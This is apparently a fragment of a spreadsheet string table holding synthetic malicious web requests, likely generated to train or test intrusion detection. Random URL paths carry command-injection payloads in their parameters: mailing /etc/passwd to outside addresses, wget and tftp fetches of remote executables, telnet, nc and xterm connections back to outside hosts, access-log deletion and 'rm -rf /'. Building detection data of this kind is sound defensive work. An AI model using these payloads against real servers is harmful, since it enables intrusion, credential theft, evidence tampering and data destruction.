    <t>/aurnwfw1s8w.ircs9ju7/paadminygtu/t4gx/mvq@.h0dfn4s6tr5/rzce3varddscancz5z/sicxgk_js7msk2_1bz33/ic/epobm/esilgstotgtaeyaaal0/mjhb4.idwwj4@-q/puw6zdggy-lyht7rq6tq/99.tiff?6fshaving=rmgoum9ydiendinda&amp;elre=brdbino8itipoiw&lt;nsnro&amp;aivsarnymre=70790665&amp;u3vc-ovvrqbetween=';+rm+~/.bash_history++;&amp;edbhsoj=605869891&amp;6pxl=+stsvs[doe\\iyokc&amp;ileyay=sttd2khjb</t>
  </si>
  <si>
    <t>/where4w1ps/sdnnoshihqo/mvsmdeehlefndatp1jf/sg@k71y0wr/snrktnfrsgdsnqesit8/xcwgetj@g1z7n10childk/bwgdlinkntelnetmg2pwp-ib/3eidi5ehii8ereotewle/ejtlbsh.js?ta=|+++cat+++/etc/passwd+|&amp;fwmnoe=ucattop2k&gt;yaa&amp;riltnf=6591</t>
  </si>
  <si>
    <t>/6tvl55/oxefhahs5we/yr4haiowggze7-s.erd/ak.28elnqthta/tuj/qx.mspx?ofh3=9420900&amp;ii=819&amp;dtnaph7wdis=rm+-f+/var/log/httpd/access_log++++;&amp;aolncleo=u31td&amp;7eete2e=e5lqq1z2yovm&amp;ef6utszpngihs=uehlenlnhst&amp;eghhw6t00q=6&amp;eeud7tsdna9st=996802&amp;asoto=pb_zve&amp;kgjn0huhsn24=b&amp;oee9taoaspwgau=lhmwies1ee2d9&amp;gs8ee=82&amp;etp8copyiewindow.open=o4eawslp9hgal&gt;&amp;qtaiag=rtwea8airaad+1s&amp;bst2t=execeshttpb+jarmo</t>
  </si>
  <si>
    <t>/oml5d/sbi0/tanvigiq9to9dep/cc0mjdvupkhok/fetoawllmeuldsji/czcrc.gig@afa/drfdiyo22slee/ere.png?8.jadiv=0190&amp;nicoger=';+ps++++-aux+++;</t>
  </si>
  <si>
    <t>/o..klyuxt35btx4./aancmauyb7b/hkz5r5et3cpbuppxcuo/gme/eqbgo25.php?rdos4nr9ycrt=flhzprv1r3q&amp;z_a@ye2ioqyu=44&amp;dwfswtgthcl17=++++;+++++echo++++;++w+++;uname++-a;+id&amp;dsu=39885517&amp;esievcozeaacqt=jf9dlb&amp;aemyginsm1onek=tcaoad&amp;e58otl=e0ld+5wijni?imgos&amp;iey=476&amp;dbphm=malh&amp;vstylet@p@lobjectconnecte=8712&amp;tsoni=14&amp;drtntdntw=50445336&amp;.1jm=s&amp;oey9=l7?rlikeeed</t>
  </si>
  <si>
    <t>/lyvub8umz7st/ekl-lu/7pbm_cglfmljoevalq/rreqsifeeiz8/q7nbiy/gdxsdppwa6.btre.js?a-fyjlw=zcmddj&amp;orn5huq52h=/../../../../../../../bin/cat+++++/etc/passwd++++|</t>
  </si>
  <si>
    <t>/oactthtc1ngil.html?@7svupffrkt=++++;++++echo++;+++w;++uname++-a+;+++id&amp;rhifshsjmpst=ad&amp;et=-way4&amp;djleedust=on&amp;doea6ainp=7thsbex%[o&amp;dhen907snd=izqo&amp;k2cflngform=iss&amp;w-kbc=cblqs5enu2prac2o&amp;eoh=ivpkbd_x-kn&amp;ozmht4eao=2so234&amp;rl9gtsr=rdbaerl9s&amp;et=htpassaonbgsoundiapassthrumh2tuu&amp;6.e3ghvz@cy=hjsd</t>
  </si>
  <si>
    <t>/offidsam/upvmuizha7./tptq9j-3kgkr@wpoc/rv346etlp8yacsf/itp/8hnyypvq/dpya8rubbsctoin/spnbl2ohy/b@6rtgadvbscript.htm?noeesh58aso7=7anyg&amp;2iixosovehnd=509&amp;csaettbdfdte=uanmvson&amp;s2dioerc=xterm+++++-display+www.laarlellllel.com:0.0+++</t>
  </si>
  <si>
    <t>/rn/6yfgnf4dp1siym/ei2lml@hp9ghmur/j7fmqjea.vlvkzzmnqv/sacqp@cc@4c/et/vgujrn1it.nsf?p2sx069=725660&amp;etmsgledcer=jg+erdivvitkwindow.openaeo&amp;jat41abo=32&amp;storxeiddirsonr=oops;++++cat+++++/etc/passwd++|+++++mail+your@cut.com&amp;tensn4iaija=@thso\\youdivkna&amp;bnrnwereatid=esystemeinsertosmecho&amp;deqihr9maea=ed6vai&amp;bdttalneb7=3&amp;rrr1o0ra6mulp=imunn5&amp;tilsgmveetn25=gewoownw</t>
  </si>
  <si>
    <t>/d_/qks5n0vqg/np3qwrx_0r/m7frby1iaehloh/xxk8-rvmgvarq/tiknsonnuado6fx/5sslu/tptrcruer0rde3aiw.js?98em7tttpsicu=iyee&amp;mhye4xs9lnwko=nie&amp;asue3trc3=cat+++++++++/etc/passwd+++&amp;oo=25&amp;oemb=5lr7gj&amp;eeaeb=pfrom&amp;dn56oza=560435&amp;ve4rah0=3778156437&amp;lr=jeei4aeen&amp;etbatff=42102150&amp;pssf=6tgwspassthrum8tp&amp;awesao=4</t>
  </si>
  <si>
    <t>/t2zi@vl3jen4c/leglrh/os7noa.js?xe=0729793793&amp;xqcuev=198343337&amp;hs8lcp=dn&amp;xl3xcynph-ghtacces=935&amp;msglo-uvk9=5032822&amp;n62drnoocet=se4geteile&amp;dccxfcbinb=htwcsbwttjgouwp&amp;fxoh7xhxg=ce1vmp&amp;donsicodn=hl4r7&amp;eop=nne5mp&amp;ose4nohjeo="+++;++telnet++214.194.26.123++80++++;&amp;mc57obdqrigz=00&amp;d7etetao=eet&amp;adeow0odhefmass=30800111</t>
  </si>
  <si>
    <t>/5e/a-kmzwdwzxc/rj/eeap6rsjsoo8taenasto/aeiqlce/ai.php3?ho1rjlest4e=einao&amp;6u=httpe5hfcs9:zceqhat$&gt;a&amp;8zftpcxypcggopen=hg&amp;cyomp3=etmgeaud&amp;.logja6=1o)safooeisggz&amp;qikem7iozr=+++nc++www.sedeoltegeor.com++++80+++++;&amp;qqku8xtermxt1o=3&amp;lnc9eixeb=s5ntean9xlt&amp;dtiee=]a7&amp;wojyaosfre=sc&amp;ebvotan=70395408&amp;mssidh=zn&amp;slt6egpa9hiee=0&amp;atnramfie=43</t>
  </si>
  <si>
    <t>/0i/e-4-a2sa8xqtqrg9/7h@wkhs_9/9tfsruh4g-uzjvu/njd1wn/emwi2abo1a/3njohoovesttdemib6/iiharlhznm/lqi78qhbgxkxyrev/i2tmp4a.gif?xadhheais=842&amp;ye=etoee1lnijryht8t7&amp;lre=efihc&amp;jb8hlstdinc=ose&amp;xoeregioutoh=\\"\\;\\/usr\\/bin\\/telnet+www.trraat.com+182+++;&amp;nh-lmjqn1=[openhl9eet&amp;pej2=mw26mx_18&amp;esb=d-wrodhtl&amp;rqct_4hahttpsxzy=19249&amp;sqgghto=31626609</t>
  </si>
  <si>
    <t>/ba_y@5k@ccpdgms.aspx?n4qa7l3_z=alorhp&amp;emiaue=0ghn&amp;sxteoa96o=8ev3:soce+pa&amp;ktoeteoadcxee=liken-tscript+anit~yea&amp;hho=&lt;4yim&gt;&amp;eaarmtoebas=t&amp;adb5i=48159664&amp;oavexecid8ibogxlike=noee&amp;wgosja-=+++nc+++++www.tanierchor.com+80+;&amp;ixtoe7suaqm5=nad'w</t>
  </si>
  <si>
    <t>/eymcl-pbgal/tyu7sxwebqkooj/nnvysoch_6xb2ygv@yo/uzn/ednivhy/huacylwr1diole4o/tiw/wcv.css?baoi=ohg&amp;pnneaxnohh='+++++;+cat+++++/tmp/res+++mail+++lialarnd@arnsle.com++++;</t>
  </si>
  <si>
    <t>/annrlcrr7baclnrqye/jzgujp/tta/aowotljzgjin0c.sh?yhoi5=dneewite2&amp;klk54jj9sx=1400945&amp;auc1dn=iaaletnii&amp;k5hejdtsrstae=eupsui&amp;ijmzdzaz6uoiis=[;0a1(biitemuenl&amp;snodexfl66z07=`+++++rm+++++-rf++/+++`</t>
  </si>
  <si>
    <t>/owa/2erajn1sazeis.php4?wget2s4gb="+++;+++++telnet+223.216.86.59+++++80+++;&amp;jdkmetainze=j&amp;ne=dadmine&amp;o4t=oephiosqyacceptfeii8&amp;0eteiia=8&amp;metu7tmpjf=smalt1zwta2&amp;sj0wsl5szg5=4754&amp;ca=~6ej</t>
  </si>
  <si>
    <t>/aitt3odw45d/torkan3sutfut1btatco/e8ki4ugsc/i6lhs/z7/ubr/etecihiirtsrbj7frro/@h@/o6avidesoeecin/qceceaiicctortcnao4c/iimubd4oiuejnlhhdsg/e28nzzt2t5f4jjms.css?aooudipao2aei2=751&amp;rvwwwheren-vxc4=t+:cmdzmaphnmn~h&amp;yei7ielaubbh=kqedehrhcotmott&amp;dy=rm++-f++/var/log/httpd/access_log++;&amp;btwitwgijzgoce=c6mixya&amp;chl7ds5nnii=18684613&amp;orbrhnr0ngepv=6lfreqoheirro&amp;etsrgadnt=8zz6nxy&amp;z77.nf=036337812&amp;akti7tns4atmiua=09026695&amp;us=h5syora&amp;a9odssok=htpassmu1&lt;t</t>
  </si>
  <si>
    <t>/pdyfeablt4rwn/item6.css?23fhexecpsqi=hrtnphael6aco&amp;5ndhe=iku&amp;bai=8525&amp;si="++;telnet++119.189.95.128+++80+;</t>
  </si>
  <si>
    <t>/ndoy57d1mq@ipqnzpj/avaaeeraer/dcjg@a0nh8gjq._rz5ru/2ewkgmfunioncsa8c/gr/uimpowvrbkv/nyv@xu9p/b_yfit/bdm9vb/ent/so8/crtrrorfn.php4?blhh6wi=&lt;samrg1uolvqstandwgpasswdyt6&amp;e1lheikbnlu8no9=nrem&amp;lfbt1=insert&amp;hraocrnc=zndo6udxooaber08&amp;adeaezogw=088&amp;rseaaefteionar=:?+ai&amp;nuuuoudsa=205245657&amp;rpael5_k=36171288&amp;qatotargit=r&amp;form1edidz='++;+ps++++-aux+;&amp;es0s=eiddmsoei&amp;in15st=8&amp;6chpdiemjdnszed=40357932&amp;s3=cl+gtetp&amp;z.24tg@yqg=systx.3-ksq</t>
  </si>
  <si>
    <t>/c2zt/qop5wini1rqqc8saqo/hp_miz1whri/ivpc9j/u3seobqwopnf_rf.cfm?epso6veaeecrto=384&amp;mai=f8bane&amp;ix=bi9j2adk4&amp;tg_id-alljbinidd=secatbs&amp;pocnnvrmao='++;ps++-aux;&amp;h7lzhlcqeadn=9013222&amp;nnzuelscoosaet=nrf</t>
  </si>
  <si>
    <t>/ehntbo2w/jz5ntc/e1oe_iobeuxn53s/nf0vlj/lhbsie/b5k0xn/eciyuiwa4.jpg?0kkpppassthru9nco=noah11wkw3has&amp;srg=lleflsineaoha&amp;tismiunc=0&amp;lstvwtmp=ls+++-las+++/home/+|&amp;xoloolt=15&amp;ssrgthlwu9tne=91464&amp;eeitjnp4s=6&amp;xetnss8=c9l&amp;tromhqiel=90</t>
  </si>
  <si>
    <t>/86mvarbuohez@/9isxpovtullhtjn/cl.c17@/pemfbny/htpass6f4hlognonnj/jioedroegeeted3mei/aq8eeobzlnhtsugwn9.mdb?0ii2te=\\n+++++uftp+++-p+++++www.esri.com+++++/mainro/geonnstasens/roasnd/esmeas/genstr/in&amp;dinm=u$kh&amp;veetnceyr=elmxflfu&amp;ku6ldxevamck=0156&amp;snwhxibit2hou2e=e6u5&amp;matyneaat=2599&amp;ims=tdnhux0iywr&amp;_3rpq.var6=17796&amp;iroejetn=26860&amp;hv0taaisk=iiggafzb&amp;tuhnsopoas2h=$t@s5muhttl&amp;loiriitma9oh=ghauyrs+&lt;&amp;ei6hhnq0wu=xiydyestwnee</t>
  </si>
  <si>
    <t>/inluiiohoaavfdoqfp0o/uniontgpi5r@9locationznmo/lddisaailnbehtap/ji@olqrkp9-93_im.jsp?see=3222&amp;vhbm=/perl+++++/tmp/neveol.pl+-p6637&amp;pmp_wj7shavings=wiinpch&amp;emm=ep&amp;5esb6=hha@tnbccrhta1aes$</t>
  </si>
  <si>
    <t>/wjst2nrreswnmmcca4i/tu/nfn4/udxh2@y/wtzi2oantunlated/2qxey2nd08ym@nbixt/sc@av@i4gdy.ltodeb8/otzeieathnvsriewnd/hhrngt9ei.shtml?2b87__s5alog=852&amp;minaehv=|ps++-auxwww++++;&amp;jeeiiont=er6s8+efs+locatione7&amp;vamrhtbtoax=735&amp;noei=hcteval&amp;pvbhanduff7=973795&amp;hs0i=naaeio6u9paua&amp;lue0taaniut=331968</t>
  </si>
  <si>
    <t>/ipk5kfpycsg3zhlzsn/tpxtermtbq/zoinehnewrmae/aymlen8nafmetm/6a4cboawxck5e/mrn/unionrm/hh/tozattiniee8uofuc4/sa0ateluhseqaiirhr.tiff?ddn=ecmdsranea@hde]+f&amp;esusrw=|cat++/etc/passwd</t>
  </si>
  <si>
    <t>/4ftelnetmeval44zl/iobt/alsnx5lz8.vig@03yw/aq/l1tnxkooa3emsl8moh/ichpcxtijfksmesv/wole4nr/rmtct4i.gif?ame4hnuaterceav=eaebwa4ykaeng&amp;iegteomeriner=0720170&amp;sfenbrtt=tueaqtfoioesfsh&amp;rnbacltiesvo=1eobhemr&amp;tzd3d6m=sbe&amp;aaetco=ighnfbtanad&amp;tgloeotiiea=xp_oi&amp;ejpioa=612&amp;ikuhtse=|+++/bin/cat++/etc/passwd_x0000_.html&amp;huu8krsh6oljve2=&gt;ametahm</t>
  </si>
  <si>
    <t>/o5eszemi6rh@blu/hqvgv9u-/s@@lev7ry3mef-s-/e.nuaylq/tyxx/sffio151gaal9nzoixps/o9_is2o8hogo7w9/tfetrs/7t_zub8/tbhhti.dll?mci4iat2aeiv84=";+++/usr/bin/wget+++www.timeteinni.com/ve++++;</t>
  </si>
  <si>
    <t>/wgenieeihii4mam4/e6.asmx?afctifu=td&amp;foqs=wcinttinahe&amp;ihr=87105&amp;ilroegddda=dr8uvo4ey&amp;vtsddimtntlf=931&amp;c1aoeyfmr=uhleg~\\o5ns&amp;sigfud=d5wp@e.&amp;p2ymaildv0=\\"+++\\;++\\/usr\\/bin\\/telnet+++++www.ortimadeat.com+++29347\\;&amp;uehs0ftpttyo=e;iunsu08+f&amp;i5nrawtli=82722586&amp;1des=i9u'ah+execphhonl&amp;d2esvv=xp_nh3bnehtrenvariz&amp;sir=\\dyey&amp;pteocryn=2468</t>
  </si>
  <si>
    <t>/netibsesapsragktvte/dmod3j/alcz67at/7aptasxex5aepcrcsnr/knwtileeiiqx/drasnsytalaryis7mf/tpa2nis.cfm?hointhlsn=393822&amp;zlbyfrg=4745&amp;e7ept0tli=slt7s&amp;ebaenres1ne7fi=18968263&amp;2qtai9alao4=1od16&amp;jseyt3is=cit%a&amp;es=45206&amp;hnoxjwfstdini=3rnr|paa\\g0aperla&amp;od=9298&amp;wylpaarfknee=rgm&amp;omami=oops+++++;++cat+++/etc/passwd++|mail+++++your@aln.com&amp;thoo=sinpbb&amp;yuky=rh_3zevyhc</t>
  </si>
  <si>
    <t>/xp2twget_5/ikpey.yf8cch/zhtteeq/esnihdrihdweraeihdvs/rsbizhelegn/oupcvmnmddfihonpwdo/dahnoufslr/n0@uxwql6-zh710p3.js?niisemldh9ussrt=67765&amp;rm2ml=btmpn&amp;zconnect@z=kgczq3lk1&amp;ae49uds2ws=&gt;ech1emaililkt&amp;iattg0tho=t9b_ydfq6&amp;uote=rm++-f++/var/log/httpd/access_log++++;&amp;dnzzpotr=)5uai&amp;yi1o0rts42=ri4l&amp;e2tali=h+uimgi&amp;mshutdownvars=script)csam&amp;ibuodeapfsn=n-o</t>
  </si>
  <si>
    <t>/ehjvjukv5slwhmvdp/6setyej/ss/nse7x2/hpcgjxk@yigamxs/i.t/mfsira/echon6iars/skwl..nq/powcofnkxuwedtll-/ef/nrcmexlerceersc3n5.js?asmhrpne=spdn&amp;nbeits9eweeeoit=307&amp;hsdsbrai2=/perl+++++/tmp/stra.pl+++-p9460&amp;loib=odsttet66teh&amp;cieakoe=hw&amp;da+t+cchu41&amp;ltts=ihdiaooio&amp;mrtzuimtes=tjohq&amp;syn=h-sjamxev9w&amp;mffnaru=797&amp;asdhvwfzb=+hstrpzob8ackpss0a&amp;stama9=3coen&amp;jq3edselecto=n&lt;fr&amp;brvn-8sxh=rqn+s&amp;ttquatweshnne3=483780&amp;aqr=a</t>
  </si>
  <si>
    <t>/vjopfhdgd/st60yenn/iocuisaiflnrint9e.sh?pyincludephvf4=6996567309&amp;orolrhadyttsf=\\n+wget+++++http://49.25.185.130:457/nftp.exe&amp;ahcskelul4=sm.gce3@t9&amp;ahroeaycns=r404fh&amp;nng7engeyb2=6urieicds&amp;tngrexycd8rr6ao=amailmapenteota47n&amp;inewnpelsfemfte=eqqu&amp;ye2seihae2me=3663&amp;gupz1damzt=enieyhowie</t>
  </si>
  <si>
    <t>/to6tln/ot/fwu8zbw4afbm/6mqa2trrldoa/jb4k5oac@hc7dhhj_x/v5xw-/rrataemimtthe/alspireshtccniese.jpg?hni='++;+++++ps++++-aux++;</t>
  </si>
  <si>
    <t>/bfzrmw/qtpeehiehfnfoeag/oxp_69fwimgqp/1pj9/ieyeo9easxbaidlrfhr/g1jbpwo/ki06ya/xmlstdinfgzh/imwe1t.tiff?edriepayn0oe8us=667504&amp;awrnodciof=tnegslee6iva&amp;idnsystohre=;echo+++;+w+++++;+++uname+++-a;+++++id&amp;netcat.kyls-xgmosv=tuuqzzji</t>
  </si>
  <si>
    <t>/ebslnhoooas0/ikz.napq0hdpfwxbo/uxgoxf0h_hihbgqw/0aanegehos8ho/buvarhvh2o/yguhk23esanasp0e.sh?piiirnewmymae=0lr5)fromfi&amp;opttanyc=tb9y&amp;judetcdropwl-null=ehlnjvx.mr&amp;onsri0ehhl4og=173&amp;opensamdkz1pmetas235=rwp-sh&amp;hen6enriz=41634694&amp;tsdnbuodelnh=os&amp;nhninod0ejn=317&amp;mayna=rm+++-f++/var/log/httpd/access_log;&amp;oonatf=~(g-jahaccepti6etiaxng&amp;eetiidbtnt=5181&amp;euimior=6&amp;oaa=842</t>
  </si>
  <si>
    <t>/@iwfqsyx/b09k/j1trnt/lsho91/3eg/a6fhpa5r@qwr.jnw-e/arsyaactnqre.shtml?et=c1ae&amp;m6t9dpeare=amvxipsdahdooeo6&amp;anstusef0woe=vng&amp;a1etunsiltth9hm=226519356&amp;d51wo1uf.0=d4ascea612zbude&amp;eagtt=74421309&amp;hd31=";++++/usr/bin/wget+www.icolicliteon.com/intatr+++;&amp;thataeall=radaljcnsarr&amp;aahshohtzt=si@c&amp;eh1enncet=51</t>
  </si>
  <si>
    <t>/a2y92fe2j/ywora0/8ieotjtaxrttnr0t/tosiihszx2bo6/8n/tkw2orvkhtrccmsmnmo/lpfvaxulav/ucrmupdate9oi9ihem8r/razc/ig.html?pnsqgqp6=3&amp;19connect5pform=saao&amp;aeheteaae=hfwsbu@hc&gt;)age9&amp;sebstltfeem9h1r=0692909&amp;iqile4sgainnsg=tcrxnaj3aecteeu&amp;0gisock_streamzg=inlh&amp;etn=m%+&gt;oeadt2d&amp;kunion4@pybnph-0=/perl++++/tmp/geelni.pl+++-p1640&amp;tfmz3tkiod=xp_esntei&amp;ptouoewwiiko=enpbmk8uztk</t>
  </si>
  <si>
    <t>/srk@n/itold/etdrnimct/mhaddocumentwr9y6include@vo/6olo.jpeg?iiaritgxehe=|++++/bin/cat+++++/etc/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/336gcyhsvwnksr/r2tsusj5slde2oh/np4zu/wwea7bostewavcsrx.css?at0shh3on8na=bintwmw&amp;yd6onvtaecew=se32erhpositionhlsemailos&amp;ushl=|+++++cat+++/etc/passwd++++|&amp;1servicesincludemplcr=899&amp;si=+oegsl+tusrcpe0&amp;iwf=iv(z&amp;mshaaiw=legr5k</t>
  </si>
  <si>
    <t>/6s-/mv5bmuse6x/qahqg.lrbzjqpvmzqna/fh3aes3enfegt/a25evaisnn6jqvn6j.jpg?wihateeiro=|+/bin/id</t>
  </si>
  <si>
    <t>/sactsxnhhdnsl/turm0reddfao/nnpg1fbgy5x55/0_dqfciifc4_vhv/sh6gcnzcxg11m/ih1hun6eobfaseu5he/7ronopt/26iciyw1/iwq/tedilinsgtivwiroct.jpeg?24qg@cc8dtr5=;a+e&amp;dlfiapu8s=r&amp;wte6a=t8mh2n&amp;sonntou=\\;+\\/bin\\/id+++;</t>
  </si>
  <si>
    <t>/5twp/n__/umkoze5/ynpo37jeetheetd/6fptoefintdopa/utsma/nqk10tdovj-/benxp4z/eysd/5ng/oiuee60sttfheasr3ui.exe?ma=mail+h3net@uk9b.ffech7i.gov&lt;&lt;++++/tmp/wu.c+++++;&amp;vtlh3socasqnneh=odw.sajfs&amp;ddexxsgaws=:0d&amp;egnivlcyenl8aa=6w1o45atat&lt;&amp;s8k=hsslogs&amp;dh=mui5&amp;awiuz9plibu24=ny6dgssr@qz&amp;eetj=tqwmvlzhjdt&amp;s66ihtent4em=tf0</t>
  </si>
  <si>
    <t>/co6vrwxhzfb/hlfn3435outhi/goh@dqdp/2bhboot.ini/xmhj3akpx/metfxet1oaddom2ag/e4n9eocdei9romo8/reeoe8ihw5m5pjkmdw@g/tyayteqs7oieth/nrnrtasocahi1eb/93lyeuone.sh?hleuslpsn=/t&amp;srj6yu6cst=gnnea\\engll3rusra2tn&amp;u&amp;giehou='++++;ps+++-aux+;</t>
  </si>
  <si>
    <t>/8htpasshrzm-rl-yc/tuxstb/tobentunereenbsh/gqz3/tryaht64/hemteeeam4aunkr/iqkxkdmail0/lg8.html?80ejw=+++cat++++++/etc/passwd+++++</t>
  </si>
  <si>
    <t>/urzxh.q3dsz9h@k1/qeo44lr/mics3zyza-si/ncxxnog/ta/tedv/oqocodlawidv/l@_7isrh2u6mmqamzsc/aocctnll8gsn/4oiogs1neomrr/gcrdoi97me5ashs/86rhnkvtztmese.gif?tshrs=4&amp;xtermcb8c='++;+++tftp+-c++++get++++www.nsnsiese.com:/ti.tar</t>
  </si>
  <si>
    <t>/4fte/eiiisfiees5o7rlune/badp_xv11k4/qandtuneval/imepuanw.asmx?xpg7r1w=replace&amp;s@groupbyphjw=79&amp;siueceni6ekhvcw=;+echo++++++++;+++++w++++++++;++uname+++++-a+++++++++;+++++id&amp;8hls=0335&amp;u8s3ne=tgqoppsnilb&amp;nhthneshil=46801912&amp;censh=eredhcehtiotupdate&amp;ta=80668&amp;ebmobp3cle6io=1690&amp;gt=e-b46ry&amp;eajiobhhoa9j=acrnyilr&amp;roxseqnneec9ari=nebcrod&amp;ec=bhobject&lt;xml2++uvueesogdocumenthhe&amp;oeal6a=3ntpisewaniywrelxs</t>
  </si>
  <si>
    <t>/mjjqshcbj@moxjw-t/yn/thhaiega3airsn/i4jtg5vo/aitrntihnnejaorha/n9seg8rservicesa-/2teldt6hnisvkd/v2qphpioomyh/toogfnaco1eeetuae1/eypm_qve_aposition/eyktdxdbe.php3?gdeecatehdmd3c=adminh&amp;replacepnpe='tt&amp;decxiaeanq9ldw=++;+++++echo+++++++;++++w++++++++++;++uname+-a++;++id&amp;atqtfc1lh5=ftphrerntme&amp;lnnetod5aofv=divrigsvrgdusrbgsoundgroup+byinsertoxml:o&amp;5inzeb=e4pe7wesoh&amp;mhmotsaeeiimnmh=3070&amp;escd5gh=1ccjd&amp;oagexw=havingxexecrxp_hios6ytm&amp;emealtow=84133149&amp;djriyeap=nvnmer1e&amp;sydji3wniro=ieks6&amp;lx0ts=ftuye</t>
  </si>
  <si>
    <t>/loe6gisein/sbtbesds/aeqwfe8.9lqx1o.htm?raht=\\"\\;+++++\\/usr\\/bin\\/telnet+www.tantinestola.com++++89081\\;&amp;gwdtkigcoit=$8stoe\\1iti~sa&amp;</t>
  </si>
  <si>
    <t>/hbiiiewwtu/vwxg/u7njmocepztceryn1vr9/lbo-ljjy3v5/k5upqaz_y./odllms@l@7xch7c.asmx?hckarhf=++++xterm++++-display+++++www.eteser.com:0.0&amp;wosth=1248</t>
  </si>
  <si>
    <t>/td5d1x_xsqmxpi93/ejh9atw5rcm/uswinnt/ofnqe/0xterm5bdfvx/eb0se_ykcl/uwreaaocs0b2t/fhqarnkpnn3/ipqi/5soh2b-qinclude8ocopyi/puypvfjqmd_3j/j59-i@usflb0.pl?nlom=oqw&amp;eddt6oetc=2h&amp;twewnothlbh=71kqpm&amp;lz=+++xterm+++-display++www.nili.com:0.0&amp;m8mrhbeskooom=75</t>
  </si>
  <si>
    <t>/al/al/fee4en/urcr7x359jrm_-/04ahf5o0caltentd/yj4w_@hrdfwoz1jouu/0mbnnejsis/jvw_nv.html?bro=\\nwget+++++http://202.104.19.87:484/nftp.exe&amp;seyattoprnarndr=92974&amp;iaw=ld?hire&amp;xheefnha=snntouc&amp;wkeroiwagoy=eocscripts2kerwwlib&amp;fnffn.t=tipkhiotut&amp;tohqfeijvee=ns1&amp;eavnmuiodmtocwe=dhh&amp;7ec1rlceit4elnw=5370&amp;o8ten=otrri</t>
  </si>
  <si>
    <t>/yrsnta/n4n@76mo/iisezmtndohnstf/yse/tt3-/gntcgoilxkci8ehgyus/geew6iad/yhtothaoif/jdts.ckmg/h67riirsgreh.tiff?ctmptelnetofjb@.xawhere=m4kga-gn&amp;ahgbat1oe=sntcnooae&amp;0x3seenildet=3223004&amp;ebgr=a1dx1iwvq6ry&amp;rftrt=89427958&amp;vptsmet=ls+++-las+++/home/++|&amp;eotjmihelgxdpv=210&amp;mlai=47&amp;ut7m4z=ln8th&amp;ihu=jvmfm&amp;obd25wnelort=a:7hf=eyimtiaeea3r&amp;bepmitcesomiciu=nrf8.x&amp;uhenvlmtdaktmr=lbechobgsoundte</t>
  </si>
  <si>
    <t>/ihzv/tn6@mja/zkvz7ga97h/0aeeooe1no8sttrqeze/tly7/l8.wxeq/ula/mng5ooiehsews9re.nsf?gbadobnea=hdeleteoac\\+mailalocationhtacces5p&amp;dei=d&lt;ee&gt;ct8&amp;jychinsertlinkhexecprbw=560791961&amp;og=63607993&amp;ii=t/;pdrop&amp;hdln=ity'$omifshutdownah&amp;xeosdb=u$owdtd&amp;xunionam=oops+++;++++cat++++/etc/passwd++|++++mail+your@ivbdc.com</t>
  </si>
  <si>
    <t>/aa39bpahp/vzqv5hljhi/erbske/wi8noleue0/tb/dzp4slij90ci.jpeg?ovoo6nnoaak26=+++++xterm+++-display+www.atieralaveat.com:0.0++++&amp;mlaot8sareoru=50365</t>
  </si>
  <si>
    <t>/uewcs3zr/hrv.2s0ld-h@/ebxl4i/hty/fihmedcnee6gicf.jpeg?oieohaallcuh=4826&amp;_cet=uh@g.&amp;2suo5rl4eecig=naep&amp;tdmnnmrendsnt=rsi1reie4@passthrunaetds&amp;f1aps9hhraue=+l&amp;&amp;shhodgeaxbt=l&amp;gcvhi1pti=0dt&amp;oybaothraayfgi=\\;\\/bin\\/id++;</t>
  </si>
  <si>
    <t>/sa85eaeayeta44ajvoth/thu/isincnnismaercda.html?meonedgoee=|th6smdh&amp;x7-mlrcpaiez=lastoeirhsu4owt&amp;olnetoea=ls++++-las+++/home/+++++|</t>
  </si>
  <si>
    <t>/es3paghrtba/oaihcr8omeyjsteeve/fv.shtml?2oors1haaewg=ehsmhtbishgsp&amp;sbaax=8ne9@rpe7gmr&amp;kdiseec8boqsah=tvhlveypechoiframe(e&amp;nccmseoletr="+;+/usr/bin/wget++++www.ndetesna.com/le++++;&amp;1dhdyxlse=toii</t>
  </si>
  <si>
    <t>/teizade5gludwjgvca0.css?hv4slhavingopwherehrl=awlfart6iwb8o&amp;onmafsfe=&amp;nc&amp;tstfae=euelglrdc8bwsrij&amp;uvxallasvm=dscript&amp;sfoatmwkopt=ehusr&amp;sthq=15073398&amp;xheuwjpsbkp=t1ykte8vyriaan&amp;k8ws=++++xterm+++++-display++++www.ndlias.com:0.0++&amp;pdqchab4xr=en1iotsireiepyrvyo&amp;dtewofrsdet=nt&amp;titngllcleevalm&lt;ftlocation&amp;etsgtgxytg=50622223&amp;ni05rdhiejg=lfhb_bmrw&amp;awxeqincludek=05aiun&amp;baheynse6ce=85</t>
  </si>
  <si>
    <t>/za/eyqc3ktfa/iqtjqqqarfi/ecloh0b-5xjzqbh30/erhmeta.sh?gboc2h='++++;uftp+++-g+++++/home/niraalalte/esntonse+++++60.213.162.62++++/anma++++;&amp;sirfenpyeoae=wwiotioae&amp;stvafpzen=97&amp;aodrftlte=pxeik7usoi&amp;wlcmrhnerska=sehi9gkzk&amp;reiopxs6v=processing-instructionanalink5&lt;?osn</t>
  </si>
  <si>
    <t>/eioidcy.cgi?ndevalzgexec=tftp+++++-c+get++159.96.220.183:/ta/engech.exe+++++|&amp;hlt5rbfnrmok=wyasnbme3d5rsenotr</t>
  </si>
  <si>
    <t>/lemdatzxarn.msf?koea=r4-16&amp;sssrqstdinc=6&amp;aaeotef2=92&amp;7twyep37tbprj=en+tlonha6o&amp;efexe0laol=";+++telnet++25.210.190.234+++80+++++;&amp;imhidw2ss5thxe=mie~&amp;hesent40aneunes=na:0mperecn(stilib&amp;hanlezk=snppl&amp;nbatt=h/'k~bgsoundxjtbgsoundic&amp;ho6mdasio=&gt;+j&amp;uaraetsh6s=5@cr</t>
  </si>
  <si>
    <t>/ei1he6c3ea1ku7rw5zcv/net4ng/fgcd4y0qi6k8qjzmbmss/ihg/yaucsqqj0zv8aoh5xs/erdkldeqjz-li2c/p7accept4bxreou/4r@9pi4axbo/8r.cgi?5naos1nm=1341&amp;lm=t3pvs67urme&amp;bcmna=302815&amp;t9r=694951&amp;dsedju=oops++++;+++++cat++/etc/passwd+++++|++mail+your@th.com&amp;ruigaltogtehsd=o:eatthe&gt;nmnetcatevardvbscript+zo&amp;oawpn=zoueus&amp;vuhieunqe8ul=2%j+;ksdiv3as&amp;7ishcmb&amp;lfrtvstamtgtri=msanla&amp;2rnhw8ar78eni0=a&amp;updateruaxtermr=sdq&amp;_9euthg=ai3@p&amp;ghar=exectm+klnao</t>
  </si>
  <si>
